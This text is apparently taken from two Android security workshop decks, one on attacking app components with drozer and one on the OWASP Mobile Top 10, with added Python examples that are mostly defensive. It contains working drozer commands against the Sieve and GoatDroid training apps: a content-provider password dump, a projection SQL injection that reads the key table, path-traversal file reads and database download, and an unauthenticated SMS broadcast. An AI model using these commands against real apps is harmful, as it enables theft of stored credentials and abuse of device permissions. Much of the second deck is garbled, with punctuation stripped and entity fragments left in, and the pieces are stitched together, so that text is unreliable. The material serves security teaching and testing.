– Inter-application communication
– Inter-component communication
Android Application Components
• Activities
• Services
• Content providers
• Broadcast receivers
Android Application Components
AndroidManifest.xml defines in which way the app works and what kind of interaction between components and the outer world is possible. Permissions are set there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions
<uses-permission android:name="string" />
<permission android:protectionLevel="…" />
• Components and their attributes
AndroidManifest.xml
Android Manifest
Protection levels:
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – same certificate
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
Important attributes:
• debuggable
• enabled
• exported
• permission
[Figure: example component attributes for Activities, Services, Content providers and Broadcast receivers]
Intents
An Intent is a messaging object that is created and delivered to an intended application component. It includes all relevant information about the calling application, the desired application component and the requested action/data.
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setData(Uri.parse("http://www.google.com"));
String pack = "com.android.browser";
ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
intent.setComponent(comp);   // explicit Intent: only this component receives it
startActivity(intent);
Drozer
Open source tool to interact with other applications through IPC – the leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer
Is installed in the default package of AppUse together with adb, so it's enough to just "click and play"
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app
Activities
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• By launching it with Intents it's possible to achieve the following:
– Modify data in the background
– Trick the user
– Leak sensitive information
Activity components attacks
• General hijacking scheme
[Figure: general hijacking scheme between apps A, B and E]
• Results of an attack:
– A malicious Activity could read the data in the Intent and then immediately relay it to the legitimate one
– Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activity components attacks
• List and launch exported activities:
dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
  com.mwr.example.sieve.FileSelectActivity
  com.mwr.example.sieve.MainLoginActivity
  com.mwr.example.sieve.PWList
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components - demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services attacks
Although they generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction (it must be exported, or respond to/accept input from message formats like Intents, files or the network stack).
Services attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one by one with logcat running to check for sensitive info
• Fire off Intents and wait
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app holding the READ_SMS permission can read SMS from the built-in SMS app's repository on our device
Content providers
• What info can they hold?
– User's phone numbers
– Passwords
– SMS
• And one of the main problems is, again, permissions:
dz> run app.provider.info --permission null
Content providers attacks
• Unrestricted access to the app database – just query it:
dz> run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors might include altering data, e.g. by using the app.provider.insert command
dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to the app database
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Accessible content URIs:
  content://com.mwr.example.sieve.DBContentProvider/Keys/
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key--"
| Password         | pin  |
| thisismypassword | 9876 |
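Added example, not code from Sieve or drozer: the two drozer queries above reproduced in plain sqlite3, to show why a provider that pastes the caller's projection and selection into its SQL fails the way the output shows, and what a safe provider does instead. Table and column names follow the drozer output on this page; the rows, the ALLOWED_COLUMNS whitelist and the function names are constructed for this example.

```python
"""Added example, not code from Sieve or drozer: reproduces in plain sqlite3 why the two
drozer queries above behave as they do, and what a safe provider does instead.
Table and column names follow the drozer output on this page; the rows are made up."""
import sqlite3
from typing import List, Optional, Sequence, Tuple

def make_db() -> sqlite3.Connection:
    """Constructed stand-in for Sieve's database.db: a Passwords table plus the Key table."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT, username TEXT,
                                password BLOB, email TEXT);
        CREATE TABLE Key (Password TEXT, pin TEXT);
        INSERT INTO Passwords (service, username, password, email)
            VALUES ('mail', 'alice', X'2a2a2a', 'alice@example.com');
        INSERT INTO Key VALUES ('thisismypassword', '9876');
    """)
    return con

def vulnerable_query(con: sqlite3.Connection, projection: Optional[Sequence[str]],
                     selection: Optional[str]) -> List[Tuple]:
    """A provider that concatenates the caller's projection and selection, which is what
    SQLiteQueryBuilder.buildQuery() does when no projection map or strict mode is set."""
    cols = ", ".join(projection) if projection else "*"
    sql = f"SELECT {cols} FROM Passwords"
    if selection:
        sql += f" WHERE ({selection})"
    return con.execute(sql).fetchall()

def probe(con: sqlite3.Connection, selection: str) -> str:
    """drozer's --selection "'" test: a syntax error that echoes the SQL proves concatenation."""
    try:
        vulnerable_query(con, None, selection)
        return "no error"
    except sqlite3.OperationalError as exc:
        return str(exc)

ALLOWED_COLUMNS = {"_id", "service", "username", "password", "email"}

def hardened_query(con: sqlite3.Connection, projection: Optional[Sequence[str]],
                   where_column: Optional[str] = None,
                   where_value: Optional[str] = None) -> List[Tuple]:
    """Projection and filter column are checked against a whitelist and the value is bound
    with '?', so neither '* FROM Key--' nor a stray quote ever reaches the SQL parser.
    (In a real ContentProvider: SQLiteQueryBuilder.setProjectionMap()/setStrict(true), and
    don't export the provider at all unless other apps genuinely need it.)"""
    cols = list(projection) if projection else sorted(ALLOWED_COLUMNS)
    illegal = set(cols) - ALLOWED_COLUMNS
    if illegal:
        raise ValueError(f"illegal projection columns: {sorted(illegal)}")
    sql = f"SELECT {', '.join(cols)} FROM Passwords"
    args: Tuple = ()
    if where_column is not None:
        if where_column not in ALLOWED_COLUMNS:
            raise ValueError(f"illegal filter column: {where_column}")
        sql += f" WHERE {where_column} = ?"
        args = (where_value,)
    return con.execute(sql, args).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(probe(db, "'"))                                # the error drozer printed
    print(vulnerable_query(db, ["* FROM Key--"], None))  # Key table via the projection
    print(hardened_query(db, ["username", "email"], "username", "alice"))
```

The projection attack works because "--" starts an SQL comment, so everything the provider appends after the caller's text is discarded; that is why a whitelist on the projection matters as much as parameter binding on the selection.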
Content providers attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
Written 24576 bytes
Content providers - demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as "battery low", "boot completed", "headset plugged", etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
Broadcast receivers
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send the Intent and enjoy
Broadcast receivers attacks
Sample manifest from GoatDroid:
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>
…
<uses-permission android:name="android.permission.SEND_SMS" />
Broadcast receivers attacks
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
    // phoneNumber and message are taken from the Intent extras as-is, with no check on the
    // sender: any app that can broadcast this action gets an SMS sent under GoatDroid's SEND_SMS
    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
Broadcast receivers attacks
dz> run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all the above-mentioned items:
• Setting the android:exported attribute to false (only components running under the same user ID as the current app will be able to access the component)
• Limiting access with custom permissions on the component (or existing ones such as RECEIVE_SMS)
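Added example, not from the slides and not drozer code: a Python pass over an AndroidManifest.xml (as decoded by apktool) that applies Android's export rules to list the attack surface the drozer commands on this page poke at, and checks the two general defenses above for each exported component. The manifest is constructed around the GoatDroid receiver shown earlier; the other components, the package's SDK levels and the function names are made up for this example.

```python
"""Added example (not from the slides, not drozer code): apply Android's export rules to an
AndroidManifest.xml decoded with apktool, to list the attack surface the drozer commands on
this page poke at. The manifest is constructed around the GoatDroid receiver shown above;
the other components in it are made up for the example."""
import xml.etree.ElementTree as ET
from typing import Dict, List

ANDROID_NS = "http://schemas.android.com/apk/res/android"

def android_attr(name: str) -> str:
    """ElementTree spells android:foo as {namespace}foo."""
    return f"{{{ANDROID_NS}}}{name}"

COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="org.owasp.goatdroid.fourgoats">
  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="16" />
  <uses-permission android:name="android.permission.SEND_SMS" />
  <application android:debuggable="true">
    <activity android:name=".activities.Main">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <activity android:name=".activities.AdminHome" android:exported="true" />
    <activity android:name=".activities.Settings" android:exported="false" />
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    <receiver android:name=".broadcastreceivers.Guarded" android:exported="true"
              android:permission="android.permission.SEND_SMS" />
    <provider android:name=".providers.Legacy"
              android:authorities="org.owasp.goatdroid.fourgoats.legacy" />
    <service android:name=".services.Sync" />
  </application>
</manifest>
"""

def is_exported(elem: ET.Element, target_sdk: int) -> bool:
    """Framework defaults: an explicit android:exported wins; otherwise activities, services
    and receivers are exported iff they declare an intent-filter, and providers are exported
    by default when targetSdkVersion < 17. (Android 12+ refuses to install an app that leaves
    exported implicit on a component with an intent-filter, but older APKs still rely on it.)"""
    explicit = elem.get(android_attr("exported"))
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":
        return target_sdk < 17
    return elem.find("intent-filter") is not None

def attack_surface(manifest_xml: str) -> List[Dict[str, object]]:
    """One entry per exported component (plus a debuggable flag), in manifest order."""
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package", "")
    sdk = root.find("uses-sdk")
    target_sdk = 1
    if sdk is not None:
        target_sdk = int(sdk.get(android_attr("targetSdkVersion"),
                                 sdk.get(android_attr("minSdkVersion"), "1")))
    findings: List[Dict[str, object]] = []
    app = root.find("application")
    if app is None:
        return findings
    if app.get(android_attr("debuggable"), "false").lower() == "true":
        findings.append({"component": pkg, "type": "application", "issue": "android:debuggable=true"})
    for elem in app.iter():
        if elem.tag not in COMPONENT_TAGS or not is_exported(elem, target_sdk):
            continue
        name = elem.get(android_attr("name"), "")
        full = pkg + name if name.startswith(".") else name
        perm = elem.get(android_attr("permission"))
        findings.append({
            "component": full,
            "type": elem.tag,
            "issue": "exported without android:permission" if perm is None else f"exported, guarded by {perm}",
            "actions": [a.get(android_attr("name")) for a in elem.iter("action")],
        })
    return findings

def unguarded(manifest_xml: str) -> List[str]:
    """The components to feed into app.activity.start / app.broadcast.send / app.provider.query."""
    return [str(f["component"]) for f in attack_surface(manifest_xml)
            if f["issue"] == "exported without android:permission"]

if __name__ == "__main__":
    for f in attack_surface(SAMPLE_MANIFEST):
        print(f)
```

The launcher activity is listed too, which is correct: it is exported, and a reviewer decides whether that is intended. The GoatDroid receiver shows up unguarded with its SOCIAL_SMS action, which is exactly the drozer app.broadcast.send above; the Guarded receiver shows how the second defense changes the verdict.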
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed; they must be enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store the user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or using a sound one in an insecure way
• A few reminders (yeah, I know you know it…)
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk: convert it with dex2jar and review the resulting jar in JD-GUI (or Luyten, which usually gives more readable output)
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom ("home-made") encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/MD5, SHA-1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
• …but not when the password that decrypts it is hardcoded in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys, credentials or OAuth tokens
• Do not store keys on the device; derive them from a user password (password-based encryption) or, where available, keep them in hardware-backed storage (Android Keystore) instead
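The "how to find" list above is a manual code review; the following is an added example (editor-supplied, not code from the workshop) that does a first pass of it mechanically over decompiled Java, and adds the password-based key derivation the mitigations ask for. Point `scan_java` at the .java files that dex2jar + JD-GUI/Luyten (or jadx) produce. The decompiled snippet is constructed and com.example.vault is a made-up package; the rule list is a starting point, not a complete audit.

```python
"""Grep-level scan of decompiled Java for the crypto mistakes listed on the slides,
plus PBKDF2 key derivation so no key has to live on the device."""
import hashlib
import re
from typing import List, Tuple

WEAK_CIPHERS = {"DES", "DESEDE", "TRIPLEDES", "RC2", "RC4", "ARCFOUR", "BLOWFISH"}
WEAK_DIGESTS = {"MD2", "MD4", "MD5", "SHA1", "SHA-1"}

CIPHER_RE = re.compile(r'Cipher\.getInstance\(\s*"([^"]+)"')
DIGEST_RE = re.compile(r'MessageDigest\.getInstance\(\s*"([^"]+)"')
# key/IV built from a string literal or from a named constant
KEYSPEC_RE = re.compile(r'new\s+(SecretKeySpec|IvParameterSpec)\(\s*("[^"]*"|[A-Za-z_]\w*)')
STRING_CONST_RE = re.compile(r'final\s+String\s+(\w+)\s*=\s*"([^"]+)"')
RANDOM_RE = re.compile(r'new\s+(?:java\.util\.)?Random\(')


def check_transformation(transformation: str) -> List[str]:
    """Problems with a JCE transformation string such as "AES/ECB/PKCS5Padding"."""
    parts = [p.strip().upper() for p in transformation.split("/")]
    algo, problems = parts[0], []
    if algo in WEAK_CIPHERS:
        problems.append("weak cipher %s" % algo)
    if len(parts) == 1 and algo in {"AES", "DES", "DESEDE"}:
        # "AES" alone resolves to AES/ECB/PKCS5Padding on the usual providers
        problems.append("no mode given, provider default is ECB")
    elif len(parts) > 1 and parts[1] == "ECB":
        problems.append("ECB mode")
    return problems


def scan_java(source: str) -> List[Tuple[int, str, str]]:
    """Return (line number, problem, offending code) for each hit in one source file."""
    constants = {m.group(1): m.group(2) for m in STRING_CONST_RE.finditer(source)}
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in CIPHER_RE.finditer(line):
            findings += [(lineno, p, m.group(0)) for p in check_transformation(m.group(1))]
        for m in DIGEST_RE.finditer(line):
            if m.group(1).upper() in WEAK_DIGESTS:
                findings.append((lineno, "weak digest %s" % m.group(1), m.group(0)))
        for m in KEYSPEC_RE.finditer(line):
            kind, arg = m.group(1), m.group(2)
            if arg.startswith('"'):
                findings.append((lineno, "hardcoded %s literal" % kind, m.group(0)))
            elif arg in constants:
                findings.append((lineno, "%s built from string constant %s" % (kind, arg), m.group(0)))
        if RANDOM_RE.search(line):
            findings.append((lineno, "java.util.Random is not a CSPRNG", line.strip()))
    return findings


def derive_key(password: str, salt: bytes, iterations: int = 100_000, length: int = 32) -> bytes:
    """Password-based key (PBKDF2-HMAC-SHA256).  Only the random salt is stored on the
    device, so there is no key to pull out of the APK or the data directory."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, length)


# Constructed stand-in for what JD-GUI shows after dex2jar.
SAMPLE_DECOMPILED = '''\
package com.example.vault;

public class DbCrypto {
    private static final String KEY = "s3cr3tK3y1234567";
    private static final String SALT = "changeme";

    public static byte[] encrypt(byte[] plain) throws Exception {
        Cipher c = Cipher.getInstance("AES/ECB/PKCS5Padding");
        c.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(KEY.getBytes(), "AES"));
        return c.doFinal(plain);
    }

    public static String hashPin(String pin) throws Exception {
        MessageDigest md = MessageDigest.getInstance("MD5");
        return Base64.encodeToString(md.digest(pin.getBytes()), Base64.DEFAULT);
    }

    public static byte[] legacy(byte[] plain, byte[] key) throws Exception {
        Cipher c = Cipher.getInstance("DES");
        c.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(key, "DES"));
        return c.doFinal(plain);
    }

    public static byte[] ok(byte[] plain, byte[] key, byte[] iv) throws Exception {
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(key, "AES"), new GCMParameterSpec(128, iv));
        return c.doFinal(plain);
    }
}
'''

if __name__ == "__main__":
    for lineno, problem, code in scan_java(SAMPLE_DECOMPILED):
        print("line %2d: %-45s %s" % (lineno, problem, code))
```

The scanner follows a key back to a string constant in the same file, which is how the "hardcoded password that decrypts the db" example above shows up in practice; `derive_key` is the replacement, with the salt stored next to the ciphertext and the password asked from the user.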
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – another application, via an Intent or a content provider
  – a shared file
  – a server response
  – a third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS / WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents

  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections
  dz> run app.package.manifest <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm://" prefix allows remote installation of ANY application, while the user thinks he is installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid intent-filters on components that are not meant for other apps: declaring an intent-filter makes the component exported by default, and an implicit Intent you send can be matched by another application that defines the same filter (the system then shows a dialog so the user picks which app to use). Set android:exported="false" explicitly on internal components and address them by component name.
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – verify that a session expires (copy a cookie and try to use it after 30 minutes)
  – verify that a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another)
  – verify whether you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
  - http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling - mitigations
• Invalidate sessions on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
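The following is an added example (editor-supplied, not code from the workshop) of a server-side session store that applies the M9 mitigations above together with the M5 rule that the server, not the client, decides who is logged in: tokens come from the OS CSPRNG (256 bits, never a device ID or a timestamp), every token has an idle timeout and an absolute lifetime, a new login revokes the user's other sessions, lookups compare in constant time, and expired tokens are destroyed. A small tester-side helper flags tokens that look like an ANDROID_ID, an IMEI or a timestamp, which is the "guess another session" check from the "how to find" list. The clock is injectable so expiry can be exercised without sleeping; the timeout values are illustrative, not a recommendation.

```python
"""Server-side session handling with expiry, revocation on re-login and CSPRNG tokens."""
import hmac
import re
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

IDLE_TIMEOUT = 15 * 60        # seconds of inactivity before a session dies (illustrative)
ABSOLUTE_LIFETIME = 8 * 3600  # hard cap, however active the session is (illustrative)


@dataclass
class Session:
    user: str
    created: float
    last_seen: float


class SessionStore:
    def __init__(self, clock: Callable[[], float] = time.time):
        self._clock = clock
        self._sessions: Dict[str, Session] = {}

    def login(self, user: str) -> str:
        """Issue a fresh token; any session the user already had is revoked (auth state changed)."""
        self.revoke_user(user)
        now = self._clock()
        token = secrets.token_urlsafe(32)          # 32 random bytes -> 43 URL-safe characters
        self._sessions[token] = Session(user, now, now)
        return token

    def revoke_user(self, user: str) -> None:
        for tok in [t for t, s in self._sessions.items() if s.user == user]:
            del self._sessions[tok]

    def logout(self, token: str) -> None:
        self._sessions.pop(token, None)

    def _find(self, token: str):
        # constant-time comparison against each stored token so timing cannot leak matching prefixes
        tb = token.encode("utf-8")
        for stored, sess in self._sessions.items():
            if hmac.compare_digest(stored.encode("utf-8"), tb):
                return stored, sess
        return None, None

    def authenticate(self, token: str) -> Optional[str]:
        """User owning a live session, or None.  Expired tokens are destroyed on sight."""
        now = self._clock()
        stored, sess = self._find(token)
        if sess is None:
            return None
        if now - sess.created > ABSOLUTE_LIFETIME or now - sess.last_seen > IDLE_TIMEOUT:
            del self._sessions[stored]
            return None
        sess.last_seen = now
        return sess.user

    def sweep(self) -> int:
        """Destroy every expired token (run periodically); returns how many were removed."""
        now = self._clock()
        dead = [t for t, s in self._sessions.items()
                if now - s.created > ABSOLUTE_LIFETIME or now - s.last_seen > IDLE_TIMEOUT]
        for t in dead:
            del self._sessions[t]
        return len(dead)

    def live_count(self) -> int:
        return len(self._sessions)


# Tester side: shapes a "session token" should never have.
WEAK_TOKEN_SHAPES = {
    "looks like ANDROID_ID (16 hex digits)": re.compile(r"^[0-9a-f]{16}$"),
    "looks like an IMEI (15 digits)":        re.compile(r"^\d{15}$"),
    "looks like a unix timestamp":           re.compile(r"^1[3-9]\d{8}(?:\d{3})?$"),
}


def weak_token_reasons(token: str) -> List[str]:
    reasons = [name for name, pat in WEAK_TOKEN_SHAPES.items() if pat.match(token)]
    if len(token) < 16:
        reasons.append("too short to hold enough entropy")
    return reasons


class FakeClock:
    """Manual clock for tests and demos."""
    def __init__(self, start: float = 1_456_000_000.0):
        self.now = start

    def __call__(self) -> float:
        return self.now

    def advance(self, seconds: float) -> None:
        self.now += seconds
```

Note the ordering in `login`: revoking first, then issuing, is what makes "switching from one logged-in user to another" actually destroy the old session instead of leaving two valid tokens around.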
Thank you
pawelrzepaoutlookcom
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
